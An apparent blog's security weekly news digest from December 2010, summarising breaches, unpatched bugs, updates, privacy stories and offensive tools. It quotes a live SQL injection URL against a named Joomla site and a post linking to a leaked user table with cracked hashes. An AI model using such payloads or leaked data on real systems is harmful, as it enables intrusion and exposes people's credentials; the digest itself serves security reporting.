Thursday, 30 December 2010

Security Weekly News 30 December 2010 - Summary

Feedback and/or contributions to make this better are appreciated and welcome

Highlighted quotes of the week:

"Real IT/security talent will work where they make a difference, not where they reduce costs, "align w/business," or serve other lame ends." - Richard Bejtlich

"woodworking tools do not make chairs == security tools do not make security." - Rafal Los

"Sec guys cannot avoid IE use in the enterprise. But we could secure it a bit by using EMET. M$ should give support, though." - Román Medina-Heigl Hernández

"TSA bodyscans/pat-downs are to national security what WAF's DLP's and NAC's are to infosec." - Wim Remes

"To enforce a security policy for users without explanation is like forcing kids to eat vegetables... It will #fail" - Xavier Mertens

"...only 1 cookie was marked as both SECURE and HTTPOnly. Clearly these cookies should be rotated after an actual login, but why establish a session at all if you aren't going to protect it with these basic cookie flags?" - Michael Coates

"Avg # of days in a year a website is vulnerable to at least 1 *serious vulnerability: 200" - Jeremiah Grossman

"Any dictator would admire the uniformity and obedience of the U.S. media." - Noam Chomsky

"MD5, which usually poses a serious computational challenge to reverse <-- ROTFLMAO Serious news fail" - Martin Bos

"No wget? No problem ;) curl -LO -C - http://... <- and that's with resuming transfers" - Tomasz Miklas


To view the full security news for this week please click here (Divided in categories, There is a category index at the top): The categories this week include (please click to go directly to what you care about): Hacking Incidents / Cybercrime, Unpatched Vulnerabilities, Software Updates, Business Case for Security, Web Technologies, Network Security, Mobile Security, Privacy, General, Tools, Funny

Highlighted news items of the week (No categories):

Not patched: Internet Explorer zero-day exploit - explanation and mitigation, [0day?] sql-injection in people.joomla.org From: 'Zerial.'

Updated/Patched: WordPress 3.0.4 critical security update, VirtualBox 4.0 Simplifies Virtual Operating System Management, Adds Extensions

 

 
Is your friend really a friend on Facebook?  [articles.orlandosentinel.com]
Scammers go where the people are - Facebook.
Facebook is the latest hot spot for swindlers in search of new victims.
And the world's most popular social-networking website can be a gold mine for such crooks, experts say.
Scams on social-media sites are much the same as the ones you may have received as e-mail, said Kevin Johnson, a consultant for Secure Ideas, which does security research.
Advertisement
'The big difference in the [social-networking] scams is the level of trust that the users have,'' he said. 'People trust them more than they trust e-mail.'

 
Burglary warning for residents  [www.northumbria.police.uk]
Advice in relation to house burglary:
* ensure your windows and doors are securely locked
* avoid leaving valuables where they can be seen through windows or within easy reach of windows and doors
* never leave your car keys on view or within easy reach of the door
* fit a house alarm
* install outside security lighting which is triggered by movement
* Make a list of your property and mark it with your postcode
* Use timers for lights and radios if you are going out at night
* Report any suspicious activity to police




Secure Network Administration highlights of the week (please remember this and more news related to this category can be found here: Network Security):


 

 
I received my Loggly beta account (thanks to them!) a few days ago and started to test this cloud service more intensively. I won't explain again what is Loggly, I already posted an article on this service.
For me, services like Loggly are the perfect cloud examples with all the pro and cons. Smallest organizations may find here a perfect tool to analyze their logs with limited efforts and, at the opposite, there are two main issues regarding the security of your data sent to the cloud.

 
After suffering a massive outage last week, Skype CIO Lars Rabbe has now detailed what went wrong.
One of the root causes? A bug in the Skype for Windows client (version 5.0.0152).
Rabbe kicks off by explaining that a cluster of support servers responsible for offline instant messaging became overheated on Wednesday, December 22.
A number of Skype clients subsequently started receiving delayed responses from said overloaded servers, which weren't properly processed by the Windows client in question. This ultimately caused the affected version to malfunction.

 
I noticed while running a vulnerability scan with Nessus, that Citrix Provisioning Servers's TFTP service would crash. This service is used for the PXE booting Citrix's virtual machines, so it is rather important.
I began to wonder if I could cause it to crash with my own evil packet. Of course, I could just sniff the traffic generated by Nessus, but that takes away from the challenge and it wouldn't tell me the exact portion of the packet that caused the crash.
I did a bit of research on TFTP by reading the RFC. In addition, I found that the Wikipedia article has a pretty good description as well as some nice pretty pictures. I thought the packet most likely to cause a crash would be the RRQ (read request) and specifially the filename attribute, since it has the most manipulatable data. I then fired up Scapy.

 
VM Detection by In-The-Wild Malware  [www.networkforensics.com]
A large number of security researchers use Virtual Machines when analyzing malware and/or setting up both active and passive honeynets. There a numerous reasons for this, including: scalability, manageability, configuration and state snapshots, ability to run diverse operating systems, etc..
Malware that attempts to detect if it's running in a Virtual Machine (then change its behavior accordingly to prevent analysis by security people) is not a subject of academic fancy. A recent search of VirusTotal showed they receive at least 1,000 unique samples a week with VM detection capabilities. (This search was performed by searching for known function import names from non-standard DLLs.) Personally, my first encounter with malware that behaved completely differently inside a Virtual Machine (from a real host) was approximately eight years ago.

 
Following our earlier post on nasty network address ranges, ISC reader Tom wrote in with some interesting logs. His information ties a recent wave of Java exploits to several addresses in the same 91.204.48.0/22 netblock. The latest exploits in this case start with a file called 'new.htm', which contains obfuscated code as follows




Secure Development highlights of the week (please remember this and more news related to this category can be found here: Web Technologies):


 
IEEE Security and Privacy published an article that my group and I wrote some months ago, it's titled : Splitting the HTTPS Stream to Attack Secure Web Connections. You can find it here, check it out !

 
A study of HTTPOnly and SECURE cookie flag settings for the top 1000 websites serving HTTPS content
A basic HTTPS request was sent to to the top 1000 websites. The HTTP responses were investigated to observe the usage of HTTPOnly and SECURE cookie flags. Here is what was found:

 
NoScript vs Insecure Cookies  [hackademix.net]
Mike Perry's Automated HTTPS Cookie Hijacking just made Slashdot's front page, so I decided to spend some time nesting a countermeasure inside NoScript's request intercepting guts.
The original idea comes from an email conversation I had with pdp just after his GMail account had been compromised: he suggested to mark every cookie with the "Secure" attribute, causing the browser to send it exclusively over HTTPS connections.
Later he detailed this concept as a feature of his yet to be developed BrowserSecurify plugin:

 
Firefox 4 will not include a 'do not track' privacy option to block targeted advertising, according to the web browser's maker Mozilla.
The Firefox 4 browser will not ship with what we envision is the end-to-end solution. We don't think any browser can today.
- Firefox browser maker Mozilla
On Monday, an AFP report stated that Firefox 4, which is due for release in early 2011, would include a 'do not track' privacy option to foil behavioural advertising. Behavioural or targeted advertising products track a user's behaviour online, and serve ads based on the user's perceived interests.

 
Posted by: Giorgio in Anonymity, Mozilla, NoScript
Latest NoScript (2.0.9) supports the Do Not Track tracking opt-out proposal, joining AdBlock Plus in this experiment.
From now on, a web browser with NoScript installed warns every HTTP server it contacts that its user does not want to be tracked, i.e. that his data must not be collected for profiling and persistent identification purposes. I believe this is a safe assumption about the feelings of most if not all NoScript users.




Finally, I leave you with the secure development featured article of the week courtesy of OWASP (Development Guide Series):



Access Controls, Authentication, and Authorization need to be understood



-Multi-tier design: separate Web, application, middleware, and database tiers on DMZ's



-Proper due diligence needs to be taken to only allow access from certain IP(s) and port(s) over any connections to the applications environment such as via Business partner connections (vpn tunnels). Additionally ensure that application controls are also used to validate proper authentication and authorization for the user or device to access the application.



-Network based stateful firewall allowing only the necessary communication ports. For example this could be a stateful firewall allowing only access to a web application listening on ports 80 and 443 externally on a DMZ. From the web server DMZ only the necessary port(s) and source and destination IP(s) are allowed to the database DMZ.



-Web Application firewall(s) could also be deployed to help with common input validation checks. These usually check for malicious syntax such as for SQL injection or Cross Site Scripting attacks, or even sometimes sensitive data such as SSN leaving the environment.



-Within each DMZ the use of Private VLANs should be considered to protect application components within the same layer 2 segment. For example if there are multiple Databases used by other applications within the same DMZ on the same switch then PVLANs should be deployed. This would protect the applications database from being accessible to a compromised database on the same layer 2 segment.



-How will users or other applications authenticate to the application? In the case of a web application is basic, NTLM, or form based authentication or even multi-factor authentication with an OTP or RSA server necessary? How will thick clients or other applications be authenticated into the applications environment, such as through certificates?



-Password policies should be created, understood, and adhered to when coding the application. This should include the secure storage of credentials, only strong credentials are allowed; secure transmission of credentials, and a policy of least privilege. This should also include how passwords are reset securely.



-Role based access controls based on least privilege are adhered to and enforced throughout the application.




Source: link



Happy New Year everybody!

Security Weekly News 30 December 2010 - Full list


Category Index




Hacking Incidents / Cybercrime


 
Server was cracked using 'local file inclusion' weakness and hacking group then worked through system to access passwords and source code, sources say

 
Security researchers warn that a new mass injection attack is underway directing the visitors of hundreds of websites to a malicious Java applet which downloads a trojan.
According to Denis Sinegubko, the creator of the Unmask Parasites Web scanner, the malicious code is added at the end of HTML pages on compromised websites and takes the form of an obfuscated JavaScript function.
When parsed by the browser, this function adds a rogue IFrame to the HTML document, which loads a new.htm page from aubreyserr.com, medien-verlag.de or yennicq.be.
According to statistics from Google's Safe Browsing service, around 2,000 websites link to these domains, giving a rough estimation of the attack's impact so far.
The page called by the IFrame loads a Hidden.jar applet deceptively titled 'Java Update.' This is a Java OpenConnection-type downloader whose only purpose is to download and execute a file called host.exe.

 
BackTrack Site Compromised  [www.backtrack-linux.org]
There's nothing like having your butt kicked Christmas morning, which is exactly what happened to us today. We were owned and exposed, in true fashion. The zine also mentioned other sites, as well as the ettercap project being backdoored.

 
addons.mozilla.org disclosure  [blog.mozilla.com]
On December 17th, Mozilla was notified by a security researcher that a partial database of addons.mozilla.org user accounts was mistakenly left on a Mozilla public server. The security researcher reported the issue to us via our web bounty program. We were able to account for every download of the database. This issue posed minimal risk to users, however as a precaution we felt we should disclose this issue to people affected and err on the side of disclosure.
The database included 44,000 inactive accounts using older, md5-based password hashes. We erased all the md5-passwords, rendering the accounts disabled. All current addons.mozilla.org accounts use a more secure SHA-512 password hash with per-user salts. SHA-512 and per user salts has been the standard storage method of password hashes for all active users since April 9th, 2009.
It is important to note that current addons.mozilla.org users and accounts are not at risk. Additionally, this incident did not impact any of Mozilla's infrastructure. This information was also sent to impacted users by email on December 27th.

 
Recently, there have been reports in the news that an unauthorized third party viewed and modified ettercap forums database (hosted on our Project web service). Among other things, this exposed hashed values of ettercap forum user passwords. (In other words, if you have an ettercap account/password and you're using the same password other places, such as your SourceForge account, it would be in your best interest to change them. And not do that anymore.)
Before I go on, I want to make it very clear that this had no effect on our downloads service, our hosted apps, SCMs, forums, etc.

 
Dumb admin over at Awakenedlands.com
Here's all their code and a decrypted users table 35k of emails and 16k of
md5 decrypted hashes.
I also include most of the tables name and data, and column names.
users list: http://bit.ly/hFW7Ak
code: http://bit.ly/gN5KFk

 
Software engineer Bruce Dang led Microsoft's analysis of the Stuxnet worm.
BERLIN - It is a mark of the extreme oddity of the Stuxnet computer worm that Microsoft's Windows vulnerability team learned of it first from an obscure Belarusian security company that even the Redmond security honchos had never heard of.
The sophisticated worm, which many computer experts believe was created as a specific attempt to sabotage Iran's nuclear power plant centrifuges, has written a new chapter in the history of computer security. Written to affect the very Siemens components used at Iran's facilities, some analysts have even speculated it may have been the work of a state, rather than of traditional underground virus writers.

 
In this Dec. 22, 2010 photo, attorney Daniel Balsam, who hates spam so much that he launched a Website Danhatesspam.com, poses outside in San Francisco. From San Francisco Superior Court small claims court to the 9th U.S. Circuit Court of Appeals, San Francisco-based Balsam has been wielding a one-man crusade against e-mail marketers he alleges run afoul of federal and state anti-spamming laws with dozens of lawsuits filed even before he graduated law school in 2008. (AP Photo/Eric Risberg)
SAN FRANCISCO -- Daniel Balsam hates spam. Most everybody does, of course. But he has acted on his hate as few have, going far beyond simply hitting the delete button. He sues them.
Eight years ago, Balsam was working as a marketer when he received one too many e-mail pitches to enlarge his breasts.




Unpatched Vulnerabilities


 
A remote code execution vulnerability against Internet Explorer was announced recently, and a proof-of-concept exploit has already been added to the Metasploit products.
Microsoft doesn't have a patch out yet, but it has published a workaround which protects against this exploit, and others of a similar sort.
I urge you to familiarise yourself with the workaround, because it improves your general security posture as well as mitigating this particular problem.
The vulnerability was published earlier in the month on a full-disclosure security list. Full disclosure means that you simply tell the world about a newly-found bug, and let the world sort things out. The theory behind this is that it prevents sluggish software vendors from simply ignoring the problem and not fixing it. The disadvantage, of course, is that it alerts the Bad Guys at the same time as everyone else.

 
Hi folks,
Exists an SQL-Injection on http://people.joomla.org/events.html?groupid=1%20or%201=0%20union%20select%20all%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70;%20--
I hope which affect to any site that use this plugin, extension or
module too.




Software Updates


 
Version 3.0.4 of WordPress is a very important update to apply to your sites as soon as possible because it fixes a core security bug in our HTML sanitation library, called KSES.

 
Windows/Mac/Linux: VirtualBox 4.0 makes creating virtual operating systems a lot less bothersome. The interface is easier to get around, the virtual machines easier to move or wipe away, display and hardware compatibility is improved, and new 'extensions' can add new capabilities.




Business Case for Security


 
Burglary warning for residents  [www.northumbria.police.uk]
Advice in relation to house burglary:
* ensure your windows and doors are securely locked
* avoid leaving valuables where they can be seen through windows or within easy reach of windows and doors
* never leave your car keys on view or within easy reach of the door
* fit a house alarm
* install outside security lighting which is triggered by movement
* Make a list of your property and mark it with your postcode
* Use timers for lights and radios if you are going out at night
* Report any suspicious activity to police




Web Technologies


 
IEEE Security and Privacy published an article that my group and I wrote some months ago, it's titled : Splitting the HTTPS Stream to Attack Secure Web Connections. You can find it here, check it out !

 
A study of HTTPOnly and SECURE cookie flag settings for the top 1000 websites serving HTTPS content
A basic HTTPS request was sent to to the top 1000 websites. The HTTP responses were investigated to observe the usage of HTTPOnly and SECURE cookie flags. Here is what was found:

 
NoScript vs Insecure Cookies  [hackademix.net]
Mike Perry's Automated HTTPS Cookie Hijacking just made Slashdot's front page, so I decided to spend some time nesting a countermeasure inside NoScript's request intercepting guts.
The original idea comes from an email conversation I had with pdp just after his GMail account had been compromised: he suggested to mark every cookie with the "Secure" attribute, causing the browser to send it exclusively over HTTPS connections.
Later he detailed this concept as a feature of his yet to be developed BrowserSecurify plugin:




Network Security


 

 
I received my Loggly beta account (thanks to them!) a few days ago and started to test this cloud service more intensively. I won't explain again what is Loggly, I already posted an article on this service.
For me, services like Loggly are the perfect cloud examples with all the pro and cons. Smallest organizations may find here a perfect tool to analyze their logs with limited efforts and, at the opposite, there are two main issues regarding the security of your data sent to the cloud.

 
After suffering a massive outage last week, Skype CIO Lars Rabbe has now detailed what went wrong.
One of the root causes? A bug in the Skype for Windows client (version 5.0.0152).
Rabbe kicks off by explaining that a cluster of support servers responsible for offline instant messaging became overheated on Wednesday, December 22.
A number of Skype clients subsequently started receiving delayed responses from said overloaded servers, which weren't properly processed by the Windows client in question. This ultimately caused the affected version to malfunction.

 
Several years ago, I had some fun: I streamed live audio, and eventually video, through the DNS.
Heh. I was young, and it worked through pretty much any firewall. (Still does, actually.) It wasn't meant to be a serious transport though. DNS was not designed to traffic large amounts of data. It's a bootstrapper.
But then, we do a lot of things with protocols that we weren't "supposed" to do. Where do we draw the line?
Obviously DNS is not going to become the next great CDN hack (though I had a great trick for that too). But there's a real question: How much data should we be putting into the DNS?

 
I noticed while running a vulnerability scan with Nessus, that Citrix Provisioning Servers's TFTP service would crash. This service is used for the PXE booting Citrix's virtual machines, so it is rather important.
I began to wonder if I could cause it to crash with my own evil packet. Of course, I could just sniff the traffic generated by Nessus, but that takes away from the challenge and it wouldn't tell me the exact portion of the packet that caused the crash.
I did a bit of research on TFTP by reading the RFC. In addition, I found that the Wikipedia article has a pretty good description as well as some nice pretty pictures. I thought the packet most likely to cause a crash would be the RRQ (read request) and specifially the filename attribute, since it has the most manipulatable data. I then fired up Scapy.

 
Following our earlier post on nasty network address ranges, ISC reader Tom wrote in with some interesting logs. His information ties a recent wave of Java exploits to several addresses in the same 91.204.48.0/22 netblock. The latest exploits in this case start with a file called 'new.htm', which contains obfuscated code as follows

 
WPA-PSK Wordlist Download - 13GB  [hashcrack.blogspot.com]
Looks like my lists got compiled into a large collection of wpa passwords - well worth the bandwidth. =)
Although since its a wpa wordlist, everything below 8 chars long was removed, which is bad for other practical uses.

 
VM Detection by In-The-Wild Malware  [www.networkforensics.com]
A large number of security researchers use Virtual Machines when analyzing malware and/or setting up both active and passive honeynets. There a numerous reasons for this, including: scalability, manageability, configuration and state snapshots, ability to run diverse operating systems, etc..
Malware that attempts to detect if it's running in a Virtual Machine (then change its behavior accordingly to prevent analysis by security people) is not a subject of academic fancy. A recent search of VirusTotal showed they receive at least 1,000 unique samples a week with VM detection capabilities. (This search was performed by searching for known function import names from non-standard DLLs.) Personally, my first encounter with malware that behaved completely differently inside a Virtual Machine (from a real host) was approximately eight years ago.




Mobile Security


 
Antid0te  [antid0te.com]
Address Space Layout Randomization (ASLR) and more for jailbroken iPhones.
If you are interested in the techniques used to add ASLR to your iPhone here are the slides of my talk at POC 2010. [PDF]
If you want to see the ASLR in action have a look at the GDB output for MobileSafari without ASLR and with ASLR.
In the meanwhile part of my Antid0te research has been applied to the dynamic linker of Mac OS X Snow Leopard. By rebasing the dynamic linker dyld you can make your Mac OS X Snow Leopard installation more resilient against attacks. Read the full article here.

 
Breaking GSM Security With a PhoneWhatever assurances have been given about the security of GSM cellphone calls, forget about them now.
Speaking at the Chaos Computer Club (CCC) Congress here today, a pair of researchers demonstrated a start-to-finish means of eavesdropping on encrypted GSM cellphone calls and text messages, using only four sub-$15 telephones as network 'sniffers,' a laptop computer and a variety of open source software.

 
According to security experts, an 'SMS of death' threatens to disable many current Sony Ericsson, Samsung, Motorola, Micromax and LG mobiles. In a presentation given to the 27th Chaos Communication Congress (27C3) in Berlin on Monday, Collin Mulliner and Nico Golde, security researchers at TU Berlin, claimed that sending malicious text or MMS messages represents a relatively simple means of crashing current mobile phones. Some of the bugs discovered have the potential to cause problems for entire mobile networks.




Privacy


 
Firefox 4 will not include a 'do not track' privacy option to block targeted advertising, according to the web browser's maker Mozilla.
The Firefox 4 browser will not ship with what we envision is the end-to-end solution. We don't think any browser can today.
- Firefox browser maker Mozilla
On Monday, an AFP report stated that Firefox 4, which is due for release in early 2011, would include a 'do not track' privacy option to foil behavioural advertising. Behavioural or targeted advertising products track a user's behaviour online, and serve ads based on the user's perceived interests.

 
Posted by: Giorgio in Anonymity, Mozilla, NoScript
Latest NoScript (2.0.9) supports the Do Not Track tracking opt-out proposal, joining AdBlock Plus in this experiment.
From now on, a web browser with NoScript installed warns every HTTP server it contacts that its user does not want to be tracked, i.e. that his data must not be collected for profiling and persistent identification purposes. I believe this is a safe assumption about the feelings of most if not all NoScript users.

 
Earlier today I mentioned the report from a reader who had enjoyed his first enhanced pat-down. This reader, Ari Ofsevit, has noticed the same thing many others have reported: the high variability in whether airports with the new scanning systems are actually making passengers go through them. For instance, last month when I was traveling through San Diego (home of the original 'don't touch my junk' contretemps), I was allowed to choose between the new machines and the plain old metal detectors. I chose the old ones.

 
A 56-year-old rape survivor with a pacemaker refused a groping by TSA agents at Austin Bergstrom airport, and was subsequently arrested, pushed to the floor, dragged, and banned from flying from the airport.




General


 
Is your friend really a friend on Facebook?  [articles.orlandosentinel.com]
Scammers go where the people are - Facebook.
Facebook is the latest hot spot for swindlers in search of new victims.
And the world's most popular social-networking website can be a gold mine for such crooks, experts say.
Scams on social-media sites are much the same as the ones you may have received as e-mail, said Kevin Johnson, a consultant for Secure Ideas, which does security research.
Advertisement
'The big difference in the [social-networking] scams is the level of trust that the users have,'' he said. 'People trust them more than they trust e-mail.'

 
After the UK banking trade association wrote to Cambridge university to have a student's master's thesis censored because it documented a well-known flaw in the chip-and-PIN system, Cambridge's Ross Anderson sent an extremely stiff note in reply:
Second, you seem to think that we might censor a student's thesis, which is lawful and already in the public domain, simply because a powerful interest finds it inconvenient. This shows a deep misconception of what universities are and how we work. Cambridge is the University of Erasmus, of Newton, and of Darwin; censoring writings that offend the powerful is offensive to our deepest values.

 
 [www.newscientist.com]
Banknotes go electric to outwit counterfeiters
GOOD old-fashioned cash is to go down the electronic route, now that it is possible to stamp simple electronic circuits directly onto banknotes.
Modern banknotes contain up to 50 anti-counterfeiting features, but adding electronic circuits programmed to confirm the note's authenticity is perhaps the ultimate deterrent, and would also help to simplify banknote tracking.
Silicon-based electronic circuits are clearly too thick to be incorporated into thin and fragile banknotes, but semiconducting organic molecules might be a viable alternative.

 
So far, the analyses of OpenBSD's crypto and IPSec code have not provided any indication that the system contains back doors for listening to encrypted VPN connections. The OpenBSD developers started the code audit to investigate allegations made by Gregory Perry, the former CTO of crypto company NetSec. In an email to OpenBSD founder Theo de Raadt, Perry had accused developer Jason Wright and others of having built back doors into the IPSec stack. De Raadt made the email public and presented Perry's allegations for discussion.




Tools


 
Happy Holidays everyone! This is the latest version of the Social-Engineer Toolkit codename "Happy Holidays". This release adds new Metasploit-based client-side attacks (4 in total), many optimizations on the SET web server including proper threading to make it run faster as well as an overall of optimizations through the entire code base. The next version 1.2 will be an overhaul of function calls and centralization of modules to allow easier additions for third party contributions.
Also added in this release is a new set_config option that will automatically disable the auto redirection on the Java Applet so in examples with Multi-Attack where you use Java Applet + Credential Harvester it will now only redirect once the credential harvester is executed. This is especially useful when you get your payload execution and harvest credentials all within one attack.

 
syslog2loggly  [github.com]
Perl script to send Syslog events to the Loggly cloud via HTTPS (www.loggly.com) http://blog.rootshell.be/2010/12/27/send-events-safely-to-the-loggly-cloud

 
The PlugBot  [theplugbot.com]
PlugBot is a hardware botnet project. It's a covert penetration testing device (bot) designed for covert use during physical penetration tests. PlugBot is a research project led by Jeremiah Talamantes, a Penetration Tester and Security Researcher for RedTeam Security.

 
Ephemeral Diffie-Hellman key exchange (EDH or DHE, depending on where you look) allows two parties with no prior knowledge of each other to establish a shared secret. In SSL, DHE is used together with some method of authentication (most commonly RSA) in the handshake phase. Ephemeral DH is valued because it provides perfect forward secrecy -- the session keys cannot be recovered if the authentication method is broken (e.g., someone retrieves the server's private key).

 
WAYBACK WEBAPP HACKING  [www.room362.com]
Archive.org allows you to check the history of sites and pages, but a service most are not aware of is one that allows you to get a list of every page that a Archive.org has for a given domain. This is great for enumerating a web applications, many times you'll find parts of web apps that have been long forgotten (and usually vulnerable).
This module doesn't make any requests to the targeted domain, it simply outputs a list to the screen/or a file of all the pages it has found on Archive.org.

 
THC-IPV6  [freeworld.thc.org]
Last update 2010-12-26
A complete tool set to attack the inherent protocol weaknesses of IPV6
and ICMP6, and includes an easy to use packet factory library.
Download the current version here:
thc-ipv6-1.4.tar.gz

 
Hello!
I hope you had nice fun with Nessus bridge, but here's the OpenVAS bridge.
It is one of the PoC codes for my upcoming talk tomorrow at BerlinSides: http://www.berlinsides.org/node/14

 
This Plugin send Growl messages to OSX Systems running Growl when a session is created and when a session is shutdown, Each message will contain information about the session it is reporting on. Do make sure to configure you Growl application to receive the messages and set a password to do this go to Preferences -> Growl -> Network and select 'Listen for incoming connections' and 'Allow remote application registration' and set the password in the password field, after this go to General and stop and start Growl so the settings will take effect. If the notification will be a remote one you will have to open the UDP Port 9887

 
Blackbuntu Community Edition 0.1  [security-sh3ll.blogspot.com]
Linux Live-CD based on Ubuntu 10.10 which was specially designed for security training students and practitioners of information security.

 
What is pyrit?  [forum.intern0t.net]
Pyrit allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff. Exploiting the computational power of Many-Core- and other platforms through ATI-Stream, Nvidia CUDA, OpenCL and VIA Padlock, it is currently by far the most powerful attack against one of the world's most used security-protocols.
WPA/WPA2-PSK is a subset of WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre shared key. This master key is derived from a password which the administrating user has to pre-configure e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate following traffic. This "shortcut" eases deployment of WPA/WPA2-protected networks for home- and small-office-use at the cost of making the protocol vulnerable to brute-force-attacks against it's key negotiation phase; it allows to ultimately reveal the password that protects the network. This vulnerability has to be considered exceptionally disastrous as the protocol allows much of the key derivation to be pre-computed, making simple brute-force-attacks even more alluring to the attacker. For more background see this article on the project's blog.
The author does not encourage or support using Pyrit for the infringement of peoples' communication-privacy. The exploration and realization of the technology discussed here motivate as a purpose of their own; this is documented by the open development, strictly sourcecode-based distribution and 'copyleft'-licensing.
Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms including FreeBSD, MacOS X and Linux as operation-system and x86-, alpha-, arm-, hppa-, mips-, powerpc-, s390 and sparc-processors.
Setting Up Pyrit With Cuda Caperbilities




Funny


 

 

 
Web Service Details: LUHNChecker  [webservices.seekda.com]
Validates Credit Cards to ensure proper input. This is a FREE CDYNE service ran off of our secure servers.

 
Garfield and Santa  [www.gocomics.com]

 

 
TSA fun  [media3.washingtonpost.com]

 
no comment  [i.imgur.com]

 
Worst hurdle race ever  [www.noob.us]

 

 
Incident handling  [imgs.xkcd.com]

 
A man is dating three women  [img822.imageshack.us]

 
This is a letter sent in by a Cleveland Browns season ticket holder in 1974 to management asking them to please terminate other fans from making paper airplanes out of the programs and sailing them around the stadium. You'll poke your eye out! The reply back is something no company would have the cojones to do now.
They don't make 'em like they used to. Go Cleveland!

Thursday, 23 December 2010

Security Weekly News 23 December 2010 - Summary

Some of you might like the following article I put together last week:
http://securityconscious.blogspot.com/2010/12/migitating-isp-disruption.html

You should not be using IE, in general, but because of this New Internet Explorer vulnerability affecting all versions of IE if you do, now you have yet another reason to switch to Firefox + NoScript and if you are paranoid enough: Firefox + No Script + Request Policy :). Just switching to another browser without security extesions won't really cut it because of this: Expanding the Attack Surface.

Feedback and/or contributions to make this better are appreciated and welcome

Highlighted quotes of the week:

"A slogan for Information Security: "The more you know, the less you trust." - Dino A. Dai Zovi
"Dear web developer, exporting personal data of Irish citizens outside EU is not OK, it is against the law Data Protection Act" - Brian Honan
"Sandboxes are like WAFs - either they get bypassed or people just get pwned through stuff the sandbox/WAF allows anyway" - Stefan Esser
"With Sandboxing in play one needs at least 3 exploits, not two. 1 memcorruption + 1 infoleak + 1 sandbox escape." - Stefan Esser
"Ok so out of 16000 passwords on scrollwars 3000 people have ones which couldnt be cracked in less than 30 mins. Not to good." - Martin Bos
"So lemme get this straight. Assange leaked 2k + cablegates but now he is pissed that someone leaked the file on his rape case?" - Martin Bos
"Dear reporters: Quantum Crypto has real problems with unexpected attacker controlled input. Raw photons riskier than packets!" - Dan Kaminski


To view the full security news for this week please click here (Divided in categories, There is a category index at the top): The categories this week include (please click to go directly to what you care about): Hacking Incidents / Cybercrime, Unpatched Vulnerabilities, Software Updates, Business Case for Security, Web Technologies, Network Security, Cloud Security, Privacy, Mobile Security, Cryptography / Encryption, General, Tools, Funny

Highlighted news items of the week (No categories):

Not patched: IIS 7.5 0-Day DoS (processing FTP requests), New Internet Explorer vulnerability affecting all versions of IE

Updated/Patched: MySQL 5.5 released, Microsoft withdraws flawed Outlook update, Microsoft releases Security Essentials 2, Opera 11.00 has been released!, Google updates Chrome Beta & Dev channels, Secunia releases PSI version 2.0, Back door in HP network storage solution - Update, Oracle Unveils Oracle VM VirtualBox 4.0, When a smart card can root your computer (OpenSC patches)


 
The length of time between when a developer writes a vulnerable piece of code and when the issue is reported by a software security testing process is vitally important. The more time in between, the more effort the development group must expend to fix the code. Therefore the speed and frequency of the testing process whether going with dynamic scanning, binary analysis, pen-testing, static analysis, line-by-line source code review, etc. matters a great deal.

 
The Cost of Insecurity 2010  [www.quantainia.com]
2010 has been notable for a number of reasons, the advent of a coalition government in the UK, followed by swinging spending cuts, and a turbulent economic picture. In a regulatory sense, too, 2010 stands out: increasingly active regulators have increased fines for organisations which are found to have failed to comply with basic levels of protection around data. A new record was set with the £17.5 million FSA fine on Goldman Sachs. Moreover, the emphasis has broadened - rather than the ICO and FSA focusing solely on the financial sector. Both Hertfordshire County Council and A4E were the subject of fines for weak controls around personal data. At the same time, other regulation continues to apply - many organisations are struggling with PCI-DSS compliance, not only in the commercial sector, but also in the state sector, where cards are important for covering payments for basic services.

 
We recently met with leaders from the U.S. financial services sector, and they asked a number of questions about recent trends in insider threat activities. We are often asked these types of questions, and we can answer many of them right away. Others require more extensive data mining in our case database. In this entry, we address the following question:
Between current employees, former employees, and contractors,
is one group most likely to commit these crimes?
The answer to this question has some important implications, and not just for these particular meeting attendees. If, across all types of incidents and all sectors, the vast majority of incidents are caused by current, full-time employees, organizations may focus on that group to address the vulnerability. If, on the other hand, there are a large number of part-time contractors or former employees, there may be different controls that an organization should consider using.

 
Debora Plunkett, head of the NSA's Information Assurance Directorate, has confirmed what many security experts suspected to be true: no computer network can be considered completely and utterly impenetrable - not even that of the NSA.
'There's no such thing as 'secure' any more,' she said to the attendees of a cyber security forum sponsored by the Atlantic and Government Executive media organizations, and confirmed that the NSA works under the assumption that various parts of their systems have already been compromised, and is adjusting its actions accordingly.




Cloud Security highlights of the week


 
The Cloud Security Alliance's matrix is a controls framework that gives a detailed understanding of security concepts and principles that are aligned to the CSA's 13 domains
The Cloud Security Alliance (CSA) has launched a revision of the Cloud Controls Matrix (CCM). The new matrix (version 1.1), available for free download here, is designed to provide fundamental security principles to guide cloud vendors and help prospective cloud customers assess the overall security risk of a cloud provider.
The matrix provides a controls framework that gives a detailed understanding of security concepts and principles that are aligned to the CSA's 13 domains. The foundations of the CCM rest on its customized relationship to other industry-accepted security standards, regulations, and controls frameworks such as ISO 27001/27002, ISACA COBIT, PCI, and NIST. The latest version includes more thorough mapping around NIST and GAAP, as part of more 'holistic guidance', according to CSA.

 
Malware Persistence in the Cloud  [fasthorizon.blogspot.com]
The cloud is certainly going to change some things about malware infection. When a desktop is reset to clean state every time an employee logs in, you now have to wonder how malicious attackers are going to maintain persistent access to the Enterprise. This is similar to what happens when an infected computer is re-imaged only to end-up infected all over again.
There are several ways to maintain persistent access without having an executable-in-waiting on the filesystem. Memory-only based injection is an old concept. It has the advantage of defeating disk-based security. One common observation is that such malware doesn't survive reboot. That is true in the sense that the malware is not a service or a driver - but this doesn't mean the malware will go away. Stated differently, the malware can still be persistent even without a registry key to survive reboot. This applies to the problem of re-infection after re-imaging (a serious and expensive problem today in the Enterprise) and it also applies to the future of cloud computing (where desktop reset is considered a way to combat malware persistence).




Secure Network Administration highlights of the week (please remember this and more news related to this category can be found here: Network Security):


 
